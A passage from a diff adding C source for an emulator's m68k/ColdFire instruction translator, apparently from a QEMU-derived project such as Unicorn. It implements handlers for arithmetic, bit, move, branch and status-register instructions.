TCGv num; + TCGv den; + TCGv reg; + uint16_t ext; + + ext = cpu_lduw_code(env, s->pc); + s->pc += 2; + if (ext & 0x87f8) { + gen_exception(s, s->pc - 4, EXCP_UNSUPPORTED); + return; + } + num = DREG(ext, 12); + reg = DREG(ext, 0); + tcg_gen_mov_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_DIV1, num); + SRC_EA(env, den, OS_LONG, 0, NULL); + tcg_gen_mov_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_DIV2, den); + if (ext & 0x0800) { + gen_helper_divs(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, 0)); + } else { + gen_helper_divu(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, 0)); + } + if ((ext & 7) == ((ext >> 12) & 7)) { + /* div */ + tcg_gen_mov_i32 (tcg_ctx, reg, *(TCGv *)tcg_ctx->QREG_DIV1); + } else { + /* rem */ + tcg_gen_mov_i32 (tcg_ctx, reg, *(TCGv *)tcg_ctx->QREG_DIV2); + } + s->cc_op = CC_OP_FLAGS; +} + +DISAS_INSN(addsub) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv reg; + TCGv dest; + TCGv src; + TCGv tmp; + TCGv addr; + int add; + + add = (insn & 0x4000) != 0; + reg = DREG(insn, 9); + dest = tcg_temp_new(tcg_ctx); + if (insn & 0x100) { + SRC_EA(env, tmp, OS_LONG, 0, &addr); + src = reg; + } else { + tmp = reg; + SRC_EA(env, src, OS_LONG, 0, NULL); + } + if (add) { + tcg_gen_add_i32(tcg_ctx, dest, tmp, src); + gen_helper_xflag_lt(tcg_ctx, *(TCGv *)tcg_ctx->QREG_CC_X, dest, src); + s->cc_op = CC_OP_ADD; + } else { + gen_helper_xflag_lt(tcg_ctx, *(TCGv *)tcg_ctx->QREG_CC_X, tmp, src); + tcg_gen_sub_i32(tcg_ctx, dest, tmp, src); + s->cc_op = CC_OP_SUB; + } + gen_update_cc_add(s, dest, src); + if (insn & 0x100) { + DEST_EA(env, insn, OS_LONG, dest, &addr); + } else { + tcg_gen_mov_i32(tcg_ctx, reg, dest); + } +} + + +/* Reverse the order of the bits in REG. */ +DISAS_INSN(bitrev) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv reg; + reg = DREG(insn, 0); + gen_helper_bitrev(tcg_ctx, reg, reg); +} + +DISAS_INSN(bitop_reg) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int opsize; + int op; + TCGv src1; + TCGv src2; + TCGv tmp; + TCGv addr; + TCGv dest; + + if ((insn & 0x38) != 0) + opsize = OS_BYTE; + else + opsize = OS_LONG; + op = (insn >> 6) & 3; + SRC_EA(env, src1, opsize, 0, op ? &addr: NULL); + src2 = DREG(insn, 9); + dest = tcg_temp_new(tcg_ctx); + + gen_flush_flags(s); + tmp = tcg_temp_new(tcg_ctx); + if (opsize == OS_BYTE) + tcg_gen_andi_i32(tcg_ctx, tmp, src2, 7); + else + tcg_gen_andi_i32(tcg_ctx, tmp, src2, 31); + src2 = tmp; + tmp = tcg_temp_new(tcg_ctx); + tcg_gen_shr_i32(tcg_ctx, tmp, src1, src2); + tcg_gen_andi_i32(tcg_ctx, tmp, tmp, 1); + tcg_gen_shli_i32(tcg_ctx, tmp, tmp, 2); + /* Clear CCF_Z if bit set. */ + tcg_gen_ori_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_CC_DEST, *(TCGv *)tcg_ctx->QREG_CC_DEST, CCF_Z); + tcg_gen_xor_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_CC_DEST, *(TCGv *)tcg_ctx->QREG_CC_DEST, tmp); + + tcg_gen_shl_i32(tcg_ctx, tmp, tcg_const_i32(tcg_ctx, 1), src2); + switch (op) { + case 1: /* bchg */ + tcg_gen_xor_i32(tcg_ctx, dest, src1, tmp); + break; + case 2: /* bclr */ + tcg_gen_not_i32(tcg_ctx, tmp, tmp); + tcg_gen_and_i32(tcg_ctx, dest, src1, tmp); + break; + case 3: /* bset */ + tcg_gen_or_i32(tcg_ctx, dest, src1, tmp); + break; + default: /* btst */ + break; + } + if (op) + DEST_EA(env, insn, opsize, dest, &addr); +} + +DISAS_INSN(sats) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv reg; + reg = DREG(insn, 0); + gen_flush_flags(s); + gen_helper_sats(tcg_ctx, reg, reg, *(TCGv *)tcg_ctx->QREG_CC_DEST); + gen_logic_cc(s, reg); +} + +static void gen_push(DisasContext *s, TCGv val) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv tmp; + + tmp = tcg_temp_new(tcg_ctx); + tcg_gen_subi_i32(tcg_ctx, tmp, QREG_SP, 4); + gen_store(s, OS_LONG, tmp, val); + tcg_gen_mov_i32(tcg_ctx, QREG_SP, tmp); +} + +DISAS_INSN(movem) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv addr; + int i; + uint16_t mask; + TCGv reg; + TCGv tmp; + int is_load; + + mask = cpu_lduw_code(env, s->pc); + s->pc += 2; + tmp = gen_lea(env, s, insn, OS_LONG); + if (IS_NULL_QREG(tmp)) { + gen_addr_fault(s); + return; + } + addr = tcg_temp_new(tcg_ctx); + tcg_gen_mov_i32(tcg_ctx, addr, tmp); + is_load = ((insn & 0x0400) != 0); + for (i = 0; i < 16; i++, mask >>= 1) { + if (mask & 1) { + if (i < 8) + reg = DREG(i, 0); + else + reg = AREG(i, 0); + if (is_load) { + tmp = gen_load(s, OS_LONG, addr, 0); + tcg_gen_mov_i32(tcg_ctx, reg, tmp); + } else { + gen_store(s, OS_LONG, addr, reg); + } + if (mask != 1) + tcg_gen_addi_i32(tcg_ctx, addr, addr, 4); + } + } +} + +DISAS_INSN(bitop_im) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int opsize; + int op; + TCGv src1; + uint32_t mask; + int bitnum; + TCGv tmp; + TCGv addr; + + if ((insn & 0x38) != 0) + opsize = OS_BYTE; + else + opsize = OS_LONG; + op = (insn >> 6) & 3; + + bitnum = cpu_lduw_code(env, s->pc); + s->pc += 2; + if (bitnum & 0xff00) { + disas_undef(env, s, insn); + return; + } + + SRC_EA(env, src1, opsize, 0, op ? &addr: NULL); + + gen_flush_flags(s); + if (opsize == OS_BYTE) + bitnum &= 7; + else + bitnum &= 31; + mask = 1U << bitnum; + + tmp = tcg_temp_new(tcg_ctx); + assert (CCF_Z == (1 << 2)); + if (bitnum > 2) + tcg_gen_shri_i32(tcg_ctx, tmp, src1, bitnum - 2); + else if (bitnum < 2) + tcg_gen_shli_i32(tcg_ctx, tmp, src1, 2 - bitnum); + else + tcg_gen_mov_i32(tcg_ctx, tmp, src1); + tcg_gen_andi_i32(tcg_ctx, tmp, tmp, CCF_Z); + /* Clear CCF_Z if bit set. */ + tcg_gen_ori_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_CC_DEST, *(TCGv *)tcg_ctx->QREG_CC_DEST, CCF_Z); + tcg_gen_xor_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_CC_DEST, *(TCGv *)tcg_ctx->QREG_CC_DEST, tmp); + if (op) { + switch (op) { + case 1: /* bchg */ + tcg_gen_xori_i32(tcg_ctx, tmp, src1, mask); + break; + case 2: /* bclr */ + tcg_gen_andi_i32(tcg_ctx, tmp, src1, ~mask); + break; + case 3: /* bset */ + tcg_gen_ori_i32(tcg_ctx, tmp, src1, mask); + break; + default: /* btst */ + break; + } + DEST_EA(env, insn, opsize, tmp, &addr); + } +} + +DISAS_INSN(arith_im) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int op; + uint32_t im; + TCGv src1; + TCGv dest; + TCGv addr; + + op = (insn >> 9) & 7; + SRC_EA(env, src1, OS_LONG, 0, (op == 6) ? NULL : &addr); + im = read_im32(env, s); + dest = tcg_temp_new(tcg_ctx); + switch (op) { + case 0: /* ori */ + tcg_gen_ori_i32(tcg_ctx, dest, src1, im); + gen_logic_cc(s, dest); + break; + case 1: /* andi */ + tcg_gen_andi_i32(tcg_ctx, dest, src1, im); + gen_logic_cc(s, dest); + break; + case 2: /* subi */ + tcg_gen_mov_i32(tcg_ctx, dest, src1); + gen_helper_xflag_lt(tcg_ctx, *(TCGv *)tcg_ctx->QREG_CC_X, dest, tcg_const_i32(tcg_ctx, im)); + tcg_gen_subi_i32(tcg_ctx, dest, dest, im); + gen_update_cc_add(s, dest, tcg_const_i32(tcg_ctx, im)); + s->cc_op = CC_OP_SUB; + break; + case 3: /* addi */ + tcg_gen_mov_i32(tcg_ctx, dest, src1); + tcg_gen_addi_i32(tcg_ctx, dest, dest, im); + gen_update_cc_add(s, dest, tcg_const_i32(tcg_ctx, im)); + gen_helper_xflag_lt(tcg_ctx, *(TCGv *)tcg_ctx->QREG_CC_X, dest, tcg_const_i32(tcg_ctx, im)); + s->cc_op = CC_OP_ADD; + break; + case 5: /* eori */ + tcg_gen_xori_i32(tcg_ctx, dest, src1, im); + gen_logic_cc(s, dest); + break; + case 6: /* cmpi */ + tcg_gen_mov_i32(tcg_ctx, dest, src1); + tcg_gen_subi_i32(tcg_ctx, dest, dest, im); + gen_update_cc_add(s, dest, tcg_const_i32(tcg_ctx, im)); + s->cc_op = CC_OP_SUB; + break; + default: + abort(); + } + if (op != 6) { + DEST_EA(env, insn, OS_LONG, dest, &addr); + } +} + +DISAS_INSN(byterev) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv reg; + + reg = DREG(insn, 0); + tcg_gen_bswap32_i32(tcg_ctx, reg, reg); +} + +DISAS_INSN(move) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv src; + TCGv dest; + int op; + int opsize; + + switch (insn >> 12) { + case 1: /* move.b */ + opsize = OS_BYTE; + break; + case 2: /* move.l */ + opsize = OS_LONG; + break; + case 3: /* move.w */ + opsize = OS_WORD; + break; + default: + abort(); + } + SRC_EA(env, src, opsize, 1, NULL); + op = (insn >> 6) & 7; + if (op == 1) { + /* movea */ + /* The value will already have been sign extended. */ + dest = AREG(insn, 9); + tcg_gen_mov_i32(tcg_ctx, dest, src); + } else { + /* normal move */ + uint16_t dest_ea; + dest_ea = ((insn >> 9) & 7) | (op << 3); + DEST_EA(env, dest_ea, opsize, src, NULL); + /* This will be correct because loads sign extend. */ + gen_logic_cc(s, src); + } +} + +DISAS_INSN(negx) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv reg; + + gen_flush_flags(s); + reg = DREG(insn, 0); + gen_helper_subx_cc(tcg_ctx, reg, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, 0), reg); +} + +DISAS_INSN(lea) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv reg; + TCGv tmp; + + reg = AREG(insn, 9); + tmp = gen_lea(env, s, insn, OS_LONG); + if (IS_NULL_QREG(tmp)) { + gen_addr_fault(s); + return; + } + tcg_gen_mov_i32(tcg_ctx, reg, tmp); +} + +DISAS_INSN(clr) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int opsize; + + switch ((insn >> 6) & 3) { + case 0: /* clr.b */ + opsize = OS_BYTE; + break; + case 1: /* clr.w */ + opsize = OS_WORD; + break; + case 2: /* clr.l */ + opsize = OS_LONG; + break; + default: + abort(); + } + DEST_EA(env, insn, opsize, tcg_const_i32(tcg_ctx, 0), NULL); + gen_logic_cc(s, tcg_const_i32(tcg_ctx, 0)); +} + +static TCGv gen_get_ccr(DisasContext *s) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv dest; + + gen_flush_flags(s); + dest = tcg_temp_new(tcg_ctx); + tcg_gen_shli_i32(tcg_ctx, dest, *(TCGv *)tcg_ctx->QREG_CC_X, 4); + tcg_gen_or_i32(tcg_ctx, dest, dest, *(TCGv *)tcg_ctx->QREG_CC_DEST); + return dest; +} + +DISAS_INSN(move_from_ccr) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv reg; + TCGv ccr; + + ccr = gen_get_ccr(s); + reg = DREG(insn, 0); + gen_partset_reg(s, OS_WORD, reg, ccr); +} + +DISAS_INSN(neg) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv reg; + TCGv src1; + + reg = DREG(insn, 0); + src1 = tcg_temp_new(tcg_ctx); + tcg_gen_mov_i32(tcg_ctx, src1, reg); + tcg_gen_neg_i32(tcg_ctx, reg, src1); + s->cc_op = CC_OP_SUB; + gen_update_cc_add(s, reg, src1); + gen_helper_xflag_lt(tcg_ctx, *(TCGv *)tcg_ctx->QREG_CC_X, tcg_const_i32(tcg_ctx, 0), src1); + s->cc_op = CC_OP_SUB; +} + +static void gen_set_sr_im(DisasContext *s, uint16_t val, int ccr_only) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + tcg_gen_movi_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_CC_DEST, val & 0xf); + tcg_gen_movi_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_CC_X, (val & 0x10) >> 4); + if (!ccr_only) { + gen_helper_set_sr(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, val & 0xff00)); + } +} + +static void gen_set_sr(CPUM68KState *env, DisasContext *s, uint16_t insn, + int ccr_only) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv tmp; + TCGv reg; + + s->cc_op = CC_OP_FLAGS; + if ((insn & 0x38) == 0) + { + tmp = tcg_temp_new(tcg_ctx); + reg = DREG(insn, 0); + tcg_gen_andi_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_CC_DEST, reg, 0xf); + tcg_gen_shri_i32(tcg_ctx, tmp, reg, 4); + tcg_gen_andi_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_CC_X, tmp, 1); + if (!ccr_only) { + gen_helper_set_sr(tcg_ctx, tcg_ctx->cpu_env, reg); + } + } + else if ((insn & 0x3f) == 0x3c) + { + uint16_t val; + val = cpu_lduw_code(env, s->pc); + s->pc += 2; + gen_set_sr_im(s, val, ccr_only); + } + else + disas_undef(env, s, insn); +} + +DISAS_INSN(move_to_ccr) +{ + gen_set_sr(env, s, insn, 1); +} + +DISAS_INSN(not) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv reg; + + reg = DREG(insn, 0); + tcg_gen_not_i32(tcg_ctx, reg, reg); + gen_logic_cc(s, reg); +} + +DISAS_INSN(swap) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv src1; + TCGv src2; + TCGv reg; + + src1 = tcg_temp_new(tcg_ctx); + src2 = tcg_temp_new(tcg_ctx); + reg = DREG(insn, 0); + tcg_gen_shli_i32(tcg_ctx, src1, reg, 16); + tcg_gen_shri_i32(tcg_ctx, src2, reg, 16); + tcg_gen_or_i32(tcg_ctx, reg, src1, src2); + gen_logic_cc(s, reg); +} + +DISAS_INSN(pea) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv tmp; + + tmp = gen_lea(env, s, insn, OS_LONG); + if (IS_NULL_QREG(tmp)) { + gen_addr_fault(s); + return; + } + gen_push(s, tmp); +} + +DISAS_INSN(ext) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int op; + TCGv reg; + TCGv tmp; + + reg = DREG(insn, 0); + op = (insn >> 6) & 7; + tmp = tcg_temp_new(tcg_ctx); + if (op == 3) + tcg_gen_ext16s_i32(tcg_ctx, tmp, reg); + else + tcg_gen_ext8s_i32(tcg_ctx, tmp, reg); + if (op == 2) + gen_partset_reg(s, OS_WORD, reg, tmp); + else + tcg_gen_mov_i32(tcg_ctx, reg, tmp); + gen_logic_cc(s, tmp); +} + +DISAS_INSN(tst) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int opsize; + TCGv tmp; + + switch ((insn >> 6) & 3) { + case 0: /* tst.b */ + opsize = OS_BYTE; + break; + case 1: /* tst.w */ + opsize = OS_WORD; + break; + case 2: /* tst.l */ + opsize = OS_LONG; + break; + default: + abort(); + } + SRC_EA(env, tmp, opsize, 1, NULL); + gen_logic_cc(s, tmp); +} + +DISAS_INSN(pulse) +{ + /* Implemented as a NOP. */ +} + +DISAS_INSN(illegal) +{ + gen_exception(s, s->pc - 2, EXCP_ILLEGAL); +} + +/* ??? This should be atomic. */ +DISAS_INSN(tas) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv dest; + TCGv src1; + TCGv addr; + + dest = tcg_temp_new(tcg_ctx); + SRC_EA(env, src1, OS_BYTE, 1, &addr); + gen_logic_cc(s, src1); + tcg_gen_ori_i32(tcg_ctx, dest, src1, 0x80); + DEST_EA(env, insn, OS_BYTE, dest, &addr); +} + +DISAS_INSN(mull) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + uint16_t ext; + TCGv reg; + TCGv src1; + TCGv dest; + + /* The upper 32 bits of the product are discarded, so + muls.l and mulu.l are functionally equivalent. */ + ext = cpu_lduw_code(env, s->pc); + s->pc += 2; + if (ext & 0x87ff) { + gen_exception(s, s->pc - 4, EXCP_UNSUPPORTED); + return; + } + reg = DREG(ext, 12); + SRC_EA(env, src1, OS_LONG, 0, NULL); + dest = tcg_temp_new(tcg_ctx); + tcg_gen_mul_i32(tcg_ctx, dest, src1, reg); + tcg_gen_mov_i32(tcg_ctx, reg, dest); + /* Unlike m68k, coldfire always clears the overflow bit. */ + gen_logic_cc(s, dest); +} + +DISAS_INSN(link) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int16_t offset; + TCGv reg; + TCGv tmp; + + offset = cpu_ldsw_code(env, s->pc); + s->pc += 2; + reg = AREG(insn, 0); + tmp = tcg_temp_new(tcg_ctx); + tcg_gen_subi_i32(tcg_ctx, tmp, QREG_SP, 4); + gen_store(s, OS_LONG, tmp, reg); + if ((insn & 7) != 7) + tcg_gen_mov_i32(tcg_ctx, reg, tmp); + tcg_gen_addi_i32(tcg_ctx, QREG_SP, tmp, offset); +} + +DISAS_INSN(unlk) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv src; + TCGv reg; + TCGv tmp; + + src = tcg_temp_new(tcg_ctx); + reg = AREG(insn, 0); + tcg_gen_mov_i32(tcg_ctx, src, reg); + tmp = gen_load(s, OS_LONG, src, 0); + tcg_gen_mov_i32(tcg_ctx, reg, tmp); + tcg_gen_addi_i32(tcg_ctx, QREG_SP, src, 4); +} + +DISAS_INSN(nop) +{ +} + +DISAS_INSN(rts) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv tmp; + + tmp = gen_load(s, OS_LONG, QREG_SP, 0); + tcg_gen_addi_i32(tcg_ctx, QREG_SP, QREG_SP, 4); + gen_jmp(s, tmp); +} + +DISAS_INSN(jump) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv tmp; + + /* Load the target address first to ensure correct exception + behavior. */ + tmp = gen_lea(env, s, insn, OS_LONG); + if (IS_NULL_QREG(tmp)) { + gen_addr_fault(s); + return; + } + if ((insn & 0x40) == 0) { + /* jsr */ + gen_push(s, tcg_const_i32(tcg_ctx, s->pc)); + } + gen_jmp(s, tmp); +} + +DISAS_INSN(addsubq) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv src1; + TCGv src2; + TCGv dest; + int val; + TCGv addr; + + SRC_EA(env, src1, OS_LONG, 0, &addr); + val = (insn >> 9) & 7; + if (val == 0) + val = 8; + dest = tcg_temp_new(tcg_ctx); + tcg_gen_mov_i32(tcg_ctx, dest, src1); + if ((insn & 0x38) == 0x08) { + /* Don't update condition codes if the destination is an + address register. */ + if (insn & 0x0100) { + tcg_gen_subi_i32(tcg_ctx, dest, dest, val); + } else { + tcg_gen_addi_i32(tcg_ctx, dest, dest, val); + } + } else { + src2 = tcg_const_i32(tcg_ctx, val); + if (insn & 0x0100) { + gen_helper_xflag_lt(tcg_ctx, *(TCGv *)tcg_ctx->QREG_CC_X, dest, src2); + tcg_gen_subi_i32(tcg_ctx, dest, dest, val); + s->cc_op = CC_OP_SUB; + } else { + tcg_gen_addi_i32(tcg_ctx, dest, dest, val); + gen_helper_xflag_lt(tcg_ctx, *(TCGv *)tcg_ctx->QREG_CC_X, dest, src2); + s->cc_op = CC_OP_ADD; + } + gen_update_cc_add(s, dest, src2); + } + DEST_EA(env, insn, OS_LONG, dest, &addr); +} + +DISAS_INSN(tpf) +{ + switch (insn & 7) { + case 2: /* One extension word. */ + s->pc += 2; + break; + case 3: /* Two extension words. */ + s->pc += 4; + break; + case 4: /* No extension words. */ + break; + default: + disas_undef(env, s, insn); + } +} + +DISAS_INSN(branch) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int32_t offset; + uint32_t base; + int op; + int l1; + + base = s->pc; + op = (insn >> 8) & 0xf; + offset = (int8_t)insn; + if (offset == 0) { + offset = cpu_ldsw_code(env, s->pc); + s->pc += 2; + } else if (offset == -1) { + offset = read_im32(env, s); + } + if (op == 1) { + /* bsr */ + gen_push(s, tcg_const_i32(tcg_ctx, s->pc)); + } + gen_flush_cc_op(s); + if (op > 1) { + /* Bcc */ + l1 = gen_new_label(tcg_ctx); + gen_jmpcc(s, ((insn >> 8) & 0xf) ^ 1, l1); + gen_jmp_tb(s, 1, base + offset); + gen_set_label(tcg_ctx, l1); + gen_jmp_tb(s, 0, s->pc); + } else { + /* Unconditional branch. */ + gen_jmp_tb(s, 0, base + offset); + } +} + +DISAS_INSN(moveq) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + uint32_t val; + + val = (int8_t)insn; + tcg_gen_movi_i32(tcg_ctx, DREG(insn, 9), val); + gen_logic_cc(s, tcg_const_i32(tcg_ctx, val)); +} + +DISAS_INSN(mvzs) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int opsize; + TCGv src; + TCGv reg; + + if (insn & 0x40) + opsize = OS_WORD; + else + opsize = OS_BYTE; + SRC_EA(env, src, opsize, (insn & 0x80) == 0, NULL); + reg = DREG(insn, 9); + tcg_gen_mov_i32(tcg_ctx, reg, src); + gen_logic_cc(s, src); +} + +DISAS_INSN(or) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv reg; + TCGv dest; + TCGv src; + TCGv addr; + + reg = DREG(insn, 9); + dest = tcg_temp_new(tcg_ctx); + if (insn & 0x100) { + SRC_EA(env, src, OS_LONG, 0, &addr); + tcg_gen_or_i32(tcg_ctx, dest, src, reg); + DEST_EA(env, insn, OS_LONG, dest, &addr); + } else { + SRC_EA(env, src, OS_LONG, 0, NULL); + tcg_gen_or_i32(tcg_ctx, dest, src, reg); + tcg_gen_mov_i32(tcg_ctx, reg, dest); + } + gen_logic_cc(s, dest); +} + +DISAS_INSN(suba) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv src; + TCGv reg; + + SRC_EA(env, src, OS_LONG, 0, NULL); + reg = AREG(insn, 9); + tcg_gen_sub_i32(tcg_ctx, reg, reg, src); +} + +DISAS_INSN(subx) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv reg; + TCGv src; + + gen_flush_flags(s); + reg = DREG(insn, 9); + src = DREG(insn, 0); + gen_helper_subx_cc(tcg_ctx, reg, tcg_ctx->cpu_env, reg, src); +} + +DISAS_INSN(mov3q) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv src; + int val; + + val = (insn >> 9) & 7; + if (val == 0) + val = -1; + src = tcg_const_i32(tcg_ctx, val); + gen_logic_cc(s, src); + DEST_EA(env, insn, OS_LONG, src, NULL); +} + +DISAS_INSN(cmp) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int op; + TCGv src; + TCGv reg; + TCGv dest; + int opsize; + + op = (insn >> 6) & 3; + switch (op) { + case 0: /* cmp.b */ + opsize = OS_BYTE; + s->cc_op = CC_OP_CMPB; + break; + case 1: /* cmp.w */ + opsize = OS_WORD; + s->cc_op = CC_OP_CMPW; + break; + case 2: /* cmp.l */ + opsize = OS_LONG; + s->cc_op = CC_OP_SUB; + break; + default: + abort(); + } + SRC_EA(env, src, opsize, 1, NULL); + reg = DREG(insn, 9); + dest = tcg_temp_new(tcg_ctx); + tcg_gen_sub_i32(tcg_ctx, dest, reg, src); + gen_update_cc_add(s, dest, src); +} + +DISAS_INSN(cmpa) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int opsize; + TCGv src; + TCGv reg; + TCGv dest; + + if (insn & 0x100) { + opsize = OS_LONG; + } else { + opsize = OS_WORD; + } + SRC_EA(env, src, opsize, 1, NULL); + reg = AREG(insn, 9); + dest = tcg_temp_new(tcg_ctx); + tcg_gen_sub_i32(tcg_ctx, dest, reg, src); + gen_update_cc_add(s, dest, src); + s->cc_op = CC_OP_SUB; +} + +DISAS_INSN(eor) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv src; + TCGv reg; + TCGv dest; + TCGv addr; + + SRC_EA(env, src, OS_LONG, 0, &addr); + reg = DREG(insn, 9); + dest = tcg_temp_new(tcg_ctx); + tcg_gen_xor_i32(tcg_ctx, dest, src, reg); + gen_logic_cc(s, dest); + DEST_EA(env, insn, OS_LONG, dest, &addr); +} + +DISAS_INSN(and) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv src; + TCGv reg; + TCGv dest; + TCGv addr; + + reg = DREG(insn, 9); + dest = tcg_temp_new(tcg_ctx); + if (insn & 0x100) { + SRC_EA(env, src, OS_LONG, 0, &addr); + tcg_gen_and_i32(tcg_ctx, dest, src, reg); + DEST_EA(env, insn, OS_LONG, dest, &addr); + } else { + SRC_EA(env, src, OS_LONG, 0, NULL); + tcg_gen_and_i32(tcg_ctx, dest, src, reg); + tcg_gen_mov_i32(tcg_ctx, reg, dest); + } + gen_logic_cc(s, dest); +} + +DISAS_INSN(adda) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv src; + TCGv reg; + + SRC_EA(env, src, OS_LONG, 0, NULL); + reg = AREG(insn, 9); + tcg_gen_add_i32(tcg_ctx, reg, reg, src); +} + +DISAS_INSN(addx) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv reg; + TCGv src; + + gen_flush_flags(s); + reg = DREG(insn, 9); + src = DREG(insn, 0); + gen_helper_addx_cc(tcg_ctx, reg, tcg_ctx->cpu_env, reg, src); + s->cc_op = CC_OP_FLAGS; +} + +/* TODO: This could be implemented without helper functions. */ +DISAS_INSN(shift_im) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv reg; + int tmp; + TCGv shift; + + reg = DREG(insn, 0); + tmp = (insn >> 9) & 7; + if (tmp == 0) + tmp = 8; + shift = tcg_const_i32(tcg_ctx, tmp); + /* No need to flush flags becuse we know we will set C flag. */ + if (insn & 0x100) { + gen_helper_shl_cc(tcg_ctx, reg, tcg_ctx->cpu_env, reg, shift); + } else { + if (insn & 8) { + gen_helper_shr_cc(tcg_ctx, reg, tcg_ctx->cpu_env, reg, shift); + } else { + gen_helper_sar_cc(tcg_ctx, reg, tcg_ctx->cpu_env, reg, shift); + } + } + s->cc_op = CC_OP_SHIFT; +} + +DISAS_INSN(shift_reg) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv reg; + TCGv shift; + + reg = DREG(insn, 0); + shift = DREG(insn, 9); + /* Shift by zero leaves C flag unmodified. */ + gen_flush_flags(s); + if (insn & 0x100) { + gen_helper_shl_cc(tcg_ctx, reg, tcg_ctx->cpu_env, reg, shift); + } else { + if (insn & 8) { + gen_helper_shr_cc(tcg_ctx, reg, tcg_ctx->cpu_env, reg, shift); + } else { + gen_helper_sar_cc(tcg_ctx, reg, tcg_ctx->cpu_env, reg, shift); + } + } + s->cc_op = CC_OP_SHIFT; +} + +DISAS_INSN(ff1) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv reg; + reg = DREG(insn, 0); + gen_logic_cc(s, reg); + gen_helper_ff1(tcg_ctx, reg, reg); +} + +static TCGv gen_get_sr(DisasContext *s) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv ccr; + TCGv sr; + + ccr = gen_get_ccr(s); + sr = tcg_temp_new(tcg_ctx); + tcg_gen_andi_i32(tcg_ctx, sr, *(TCGv *)tcg_ctx->QREG_SR, 0xffe0); + tcg_gen_or_i32(tcg_ctx, sr, sr, ccr); + return sr; +} + +DISAS_INSN(strldsr) +{ + uint16_t ext; + uint32_t addr; + + addr = s->pc - 2; + ext = cpu_lduw_code(env, s->pc); + s->pc += 2; + if (ext != 0x46FC) { + gen_exception(s, addr, EXCP_UNSUPPORTED); + return; + } + ext = cpu_lduw_code(env, s->pc); + s->pc += 2; + if (IS_USER(s) || (ext & SR_S) == 0) { + gen_exception(s, addr, EXCP_PRIVILEGE); + return; + } + gen_push(s, gen_get_sr(s)); + gen_set_sr_im(s, ext, 0); +} + +DISAS_INSN(move_from_sr) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv reg; + TCGv sr; + + if (IS_USER(s)) { + gen_exception(s, s->pc - 2, EXCP_PRIVILEGE); + return; + } + sr = gen_get_sr(s); + reg = DREG(insn, 0); + gen_partset_reg(s, OS_WORD, reg, sr); +} + +DISAS_INSN(move_to_sr) +{ + if (IS_USER(s)) { + gen_exception(s, s->pc - 2, EXCP_PRIVILEGE); + return; + } + gen_set_sr(env, s, insn, 0); + gen_lookup_tb(s); +} + +DISAS_INSN(move_from_usp) +{ + if (IS_USER(s)) { + gen_exception(s, s->pc - 2, EXCP_PRIVILEGE); + return; + } + /* TODO: Implement USP. */ + gen_exception(s, s->pc - 2, EXCP_ILLEGAL); +} + 